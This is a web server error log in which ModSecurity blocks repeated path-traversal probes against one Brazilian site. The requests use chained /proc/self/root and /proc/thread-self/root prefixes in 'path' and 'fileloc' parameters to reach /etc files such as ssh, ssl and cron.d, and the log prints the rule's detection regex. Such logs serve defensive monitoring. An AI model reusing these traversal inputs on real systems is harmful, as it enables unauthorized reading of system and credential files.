[Mon Mar 16 10:34:44.743028 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.241.46:33176] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG9I6lpbStxTqkSktg9AAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:34:46.023927 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:33184] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG9o6lpbStxTqkSktg9gAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:34:47.207166 2026] [:error] [pid 21533:tid 140411548894976] [client 74.7.241.46:33192] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG93jZBu2q05ozVU9JDAAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:34:49.591342 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.241.46:37510] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG-HjZBu2q05ozVU9JDQAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:34:50.598982 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.243.203:59494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG-o6lpbStxTqkSktg_gAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:50.942876 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.241.46:37514] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG-njZBu2q05ozVU9JDwAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:34:52.139363 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:37516] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG_I6lpbStxTqkSktg_wAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:34:53.523531 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.241.46:37532] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG_XbQATo66fKoS7xApwAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:34:54.652220 2026] [:error] [pid 32654:tid 140411699963648] [client 74.7.241.46:37540] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG_glT9VtDQc7bgUygIgAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:34:55.145189 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.243.203:45800] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG_7ABkC4fWIHEf8HfzgAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:56.935034 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.241.46:37546] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHAP9ocpUE4ed4uDzg3wAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:34:57.504307 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:45810] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHAXbQATo66fKoS7xAqQAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:58.807039 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.243.203:45814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHAhXjF1vJNtV6CWrsvAAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:59.292175 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.241.46:43156] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHA5qj1wV0Si-OkefdYwAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:02.482151 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.241.46:43162] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHBHjZBu2q05ozVU9JEQAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:04.904707 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.241.46:43176] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHCHjZBu2q05ozVU9JEwAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:06.233662 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.241.46:43186] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHCnjZBu2q05ozVU9JFAAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:07.491110 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.241.46:43200] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHC5qj1wV0Si-OkefdaQAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:08.764679 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.241.46:35612] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHDJqj1wV0Si-OkefdawAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:10.100548 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:35616] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHDo6lpbStxTqkSkthCAAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:11.255111 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.241.46:35622] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHD5qj1wV0Si-OkefdbwAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:12.558394 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.241.46:35626] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHEHjZBu2q05ozVU9JFQAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:35:13.711326 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:35642] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag 